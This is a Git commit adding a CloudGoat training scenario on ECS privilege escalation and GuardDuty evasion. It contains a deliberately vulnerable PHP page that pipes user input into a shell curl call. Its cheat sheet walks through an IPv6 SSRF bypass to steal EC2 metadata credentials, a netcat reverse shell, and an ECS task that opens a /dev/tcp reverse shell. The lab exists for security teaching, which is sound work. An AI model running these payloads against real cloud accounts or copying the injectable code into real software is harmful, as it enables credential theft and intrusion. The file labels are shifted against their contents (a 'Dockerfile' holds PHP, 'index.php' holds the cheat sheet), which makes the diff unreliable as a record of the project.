Add ecs_privesc_evade_protection scenario

This scenario teaches ECS privilege escalation combined with GuardDuty
detection evasion techniques. Attackers exploit a vulnerable web application
running in an ECS container to steal EC2 credentials, then spawn a new
ECS task with elevated privileges to bypass GuardDuty monitoring.

Key features:
- Vulnerable PHP web app with SSRF and command injection
- ECS on EC2 with IMDSv1 enabled for metadata access
- GuardDuty + Lambda automated incident response
- Two attack paths (easy and hard mode)
- Teaches container escape and privilege escalation

Note: Requires Docker installed locally to build and push the vulnerable
web app image to ECR during deployment.

Co-authored-by: 2W <hsp003636@gmail.com>

Author: nobodynate

README.md

@@ -351,6 +351,17 @@ Starting with access to the "ruse" EC2, the user leverages the instance profile
 
 ---
 
+### ecs_privesc_evade_protection (Medium)
+`cloudgoat create ecs_privesc_evade_protection`
+
+A user begins by accessing a working web service to a container inside EC2. The attacker can exploit a web service vulnerability to get credentials from the metadata API in EC2, or to control the container. This credential allows the attacker to initiate a new container with a specific role and control it. Based on this action, make a privilege escalation, and read FLAG in S3.
+
+> **Note:** This scenario requires Docker to be installed locally, as it builds and pushes a container image to ECR during deployment.
+
+[Visit Scenario Page.](scenarios/ecs_privesc_evade_protection/README.md)
+
+---
+
 ### secrets_in_the_cloud (Hard)
 `cloudgoat create secrets_in_the_cloud`
 

cloudgoat/core/python/commands.py

@@ -380,7 +380,7 @@ def _get_tf_vars(self, cgid=None):
             tf_vars.update({"profile": self.profile, "region": self.aws_region})
         if self.scenario_cloud_platform == 'azure':
             tf_vars.update({"subscription_id": self.azure_subscription_id})
-        if self.scenario_name == "detection_evasion":
+        if self.scenario_name in ["detection_evasion", "ecs_privesc_evade_protection"]:
             tf_vars["user_email"] = self.get_user_email()
 
         return tf_vars

scenarios/ecs_privesc_evade_protection/README.md

@@ -0,0 +1,65 @@
+# Scenario: ecs_privesc_evade_protection
+
+**Size**: Medium
+
+**Difficulty**: Moderate
+
+**Command**: `$ ./cloudgoat.py create ecs_privesc_evade_protection`
+
+## Scenario Resources
+
+- 1 ECS with:
+    - 1 * ASG with :
+        - 1 * EC2
+    - 1 * Service (web container)
+- 2 * S3 (1 * secret, 1 * cloudtrail)
+- Detection Mechanisms
+  - GuardDuty enabled
+  - CloudWatch
+  - CloudTrail
+  - EventBridge
+  - Lambda
+  - SES
+
+## Scenario Start(s)
+
+Scenario starts as a web user.
+
+> **Warning**: If GuardDuty have enabled before creating scenario, It would cause an error.
+
+> **Warning**: This scenario deploys an intentionally vulnerable web application. Always destroy the scenario when finished to avoid leaving exploitable resources in your AWS account.
+
+> **Note**: Use the docker command during the scenario creation process; the docker environment have to be ready.
+
+## Scenario Goal(s)
+
+Read flag.txt in S3 with avoiding various defense techniques.
+
+## Summary
+
+There is a very vulnerable website operating on AWS. The site's security administrator became frightened and took some web security measures and enabled GuardDuty for EC2's credentials. Take a detour and approach S3 and win the secret string.
+
+## Email setup
+ 
+- If AWS Guard Duty detects your attack in the scenario, we will send you an email. So you need to register an email and respond to AWS authentication mail sent to that email before start.
+- If you prefer not to use a standard email address, you might consider services such as https://temp-mail.org/ or https://www.fakemail.net/.
+
+# SPOILER ALERT: There are spoilers for the scenario blew this point.
+
+## Exploitation Route
+
+![Scenario Route(s)](assets/diagram.png)
+
+## Scenario Walk-through
+
+### Easy Path
+- Attacker accesses the web service of a container inside EC2 managed by ECS.
+- The attacker exploits vulnerabilities in a web service to access the EC2's credentials or take control of the container.
+- The attacker accesses S3. Gets the Secret String in `flag.txt` and exits the scenario.
+
+### Hard Path
+- Attacker accesses the web service of a container inside EC2 managed by ECS.
+- The attacker exploits vulnerabilities in a web service to access the EC2's credentials or take control of the container.
+- The attacker defines and executes an ECS task with the authority of the web developer to privesc or bypass mitigations. Perform a reverse shell attack to access the container been created.
+- The attacker accesses S3 at the container to bypass GuardDuty detection. Gets the Secret String in `secret-string.txt` and exits the scenario.
+

scenarios/ecs_privesc_evade_protection/assets/diagram.png

@@ -0,0 +1,2 @@
+Dockerfile
+.dockerignore

scenarios/ecs_privesc_evade_protection/assets/ssrf-web/.dockerignore

@@ -0,0 +1,18 @@
+FROM php:7.4-cli-alpine
+
+RUN apk --no-cache update \
+    && apk --no-cache add \
+    curl-dev libcurl \
+    groff \
+    less \
+    python3 \
+    py3-pip \
+    && docker-php-ext-install curl \
+    && pip3 install --upgrade pip \
+    && pip3 install awscli
+
+COPY . /usr/src/myapp
+
+WORKDIR /usr/src/myapp
+
+CMD [ "php", "-S", "0.0.0.0:80", "-t", "." ]

scenarios/ecs_privesc_evade_protection/assets/ssrf-web/Dockerfile

@@ -0,0 +1,48 @@
+<!DOCTYPE HTML>
+<html>
+    <head>
+        <title>SSRF</title>
+    </head>
+
+    <body>
+        <h2>Server Side Request Forgery</h2>
+
+        <form method="GET" action="">
+            <span>URL:
+                <input name="url" type="text" placeholder="" />
+                <input type="submit" />
+            </span>
+        </form>
+        <h4>Can you access meta-data? We've made security improvements!</h4>
+
+<?php
+if (isset($_GET['url'])) {
+    $url = $_GET['url'];
+
+    if (strlen($url) > 150) {
+        echo "URL is too long. Please enter a URL with 150 characters or less.";
+        echo "\n\n";
+    } elseif (preg_match('/169.254.169.254/', $url)) {
+        echo "Access to meta-data is not allowed.";
+        echo "\n\n";
+    } else {
+        $response = shell_exec("curl --max-time 10 " . $url);
+        if ($response === null) {
+            error_log("Failed to execute curl for URL: " . escapeshellarg($url));
+            echo "Failed to fetch the URL.";
+            echo "\n\n";
+        }
+        else if ($response !== null) {
+            echo "<pre>";
+            echo htmlspecialchars($response);
+            echo "</pre>";
+        } else {
+            echo "Failed to fetch the URL.";
+            echo "\n\n";
+        }
+    }
+}
+?>
+
+    </body>
+</html>

scenarios/ecs_privesc_evade_protection/assets/ssrf-web/index.php

@@ -0,0 +1,149 @@
+# Easy Path
+
+Go to `http://<ec2_ip_address>`
+
+### Command Injection
+
+```bash
+# Command Injection on web.
+; aws s3 ls
+; aws s3 ls s3://<bucket-name>/
+; aws s3 cp s3://<bucket-name>/flag.txt .
+; cat flag.txt
+```
+
+### SSRF
+
+```bash
+# SSRF Attack.
+http://<ec2_ip_address>/?url=http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>
+
+# Configure credentials.
+aws configure --profile attacker
+echo "aws_session_token = <token>" >> ~/.aws/credentials
+
+# Access to S3.
+aws s3 ls
+aws s3 ls s3://<bucket-name>/
+aws s3 cp s3://<bucket-name>/flag.txt .
+cat flag.txt
+```
+
+
+# Hard Path
+
+Go to `http://<ec2_ip_address>`
+
+### SSRF
+
+* Using IPv6 to SSRF on web with `http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/<role>`
+* Get credentials & using it to your CLI profile.
+
+    ```bash
+    aws configure --profile attacker
+    echo "aws_session_token = <token>" >> ~/.aws/credentials
+    ```
+
+### Command Injection
+
+- prepare another host for revshell attack with `nc -lvp 4000`
+- command injection on web with `; nc <ip_address> 4000 -e /bin/sh &`
+
+### For more information
+
+- more information about iam.
+
+    ```bash
+    aws sts get-caller-identity
+    aws iam list-roles
+    aws iam get-role --role-name <role>
+    aws iam list-attached-role-policies --role-name <role>
+    aws iam list-role-policies --role-name <role>
+    aws iam get-role-policy --role-name <role> --policy-name <policy>
+    ````
+
+- more information about ecs clusters.
+
+    ```bash
+    aws ecs list-clusters --region <region>
+    aws ecs describe-clusters --region <region> --clusters <cluster>
+    aws ecs list-container-instances --region <region> --cluster <cluster_arn>
+    ```
+- find available vpc subnets.
+
+    ```bash
+    aws ec2 describe-subnets --region <region>
+    ```
+
+### ECS Privesc
+
+1. Attacker prepare revshell at other public ip point with `nc -lvp 4000`.
+
+2. And now come back to CLI.
+
+3. Create an ECS Task Definition JSON File:
+    
+    Create a file named task-definition.json and include the following content.
+    Replace `<region>`, `<task_name>`, `<task_role_arn>`, `<revshell_ip>`, and `<revshell_port>` with your actual values.
+
+    ```json
+    {
+      "family": "<task_name>",
+      "taskRoleArn": "<task_role_arn>",
+      "networkMode": "awsvpc",
+      "cpu": "256",
+      "memory": "512",
+      "requiresCompatibilities": ["FARGATE"],
+      "containerDefinitions": [
+        {
+          "name": "exfil_creds",
+          "image": "python:latest",
+          "entryPoint": ["sh", "-c"],
+          "command": ["/bin/bash -c \\\"bash -i >& /dev/tcp/<revshell_ip>/<revshell_port> 0>&1\\\""]
+        }
+      ]
+    }
+    ```
+
+4. Create an ECS Run Task JSON File.
+
+    Create a file named run-task.json and include the following content. Replace `<subnet>` with the actual values for your setup.
+
+    ```json
+    {
+      "launchType": "FARGATE",
+      "networkConfiguration": {
+        "awsvpcConfiguration": {
+          "assignPublicIp": "ENABLED",
+          "subnets": ["<subnet>"]
+        }
+      }
+    }
+    ```
+
+5. Register Task Definition and Run Task
+
+    Now, you can use the AWS CLI with the JSON files to execute the commands.
+
+    ```bash
+    # Register task definition
+    aws ecs register-task-definition --region <region> --cli-input-json file://task-definition.json
+   
+   # Run task
+    aws ecs run-task --region <region> --task-definition <task_name> --cluster <cluster_name> --cli-input-json file://run-task.json
+    ```
+
+    After a few minutes, the revshell will be connected by container.
+    Let's access to s3 on revshell.
+
+### Access S3
+
+```bash
+apt update
+apt install awscli
+
+aws s3 ls
+aws s3 ls s3://<bucket-name>/
+aws s3 cp s3://<bucket-name>/secret-string.txt .
+cat secret-string.txt
+```

scenarios/ecs_privesc_evade_protection/cheat_sheet.md

@@ -0,0 +1,20 @@
+---
+  # The name of the scenario, alpha-numeric characters only, and underscore-separated
+- name: ecs_privesc_evade_protection
+  # The name of the author(s), comma separated
+- author: Yong Siwoo, Park Do Kyu, Park Seo Hyun, Jung Ho Shim, Chae Jinsoo
+  # The version of the scenario, where major versions are breaking changes and minor are small fixes.
+- version: 1.0
+  # Text displayed to the user when they type "{{ scenario_name }} help"
+- help: |
+        Within the container that is running a web hosting service on an EC2 instance managed by ECS, 
+        please access the metadata service to obtain the temporary credentials for the EC2 instance. 
+        Then, exploit these privileges to read the secret string inside the flag.txt file located within S3.
+          
+        Note: if AWS GuardDuty detects your attack, it will refresh the temporary credentials of the EC2 instance 
+        and send an alert email to the registered address. 
+        Endeavor to proceed with utmost caution to avoid triggering these alerts.
+
+# Records the date upon which this scenario was last updated, in MM-DD-YYYY format
+- last-updated: 11-02-2023
+...

scenarios/ecs_privesc_evade_protection/manifest.yml

@@ -0,0 +1,8 @@
+# Using CloudTrail for GuardDuty
+resource "aws_cloudtrail" "cloudtrail" {
+  name           = "cg-cloudtrail-${var.cgid}"
+  s3_bucket_name = aws_s3_bucket.cloudtrail_bucket.id
+  enable_logging = true
+
+  depends_on = [aws_s3_bucket_policy.trail_bucket_policy]
+}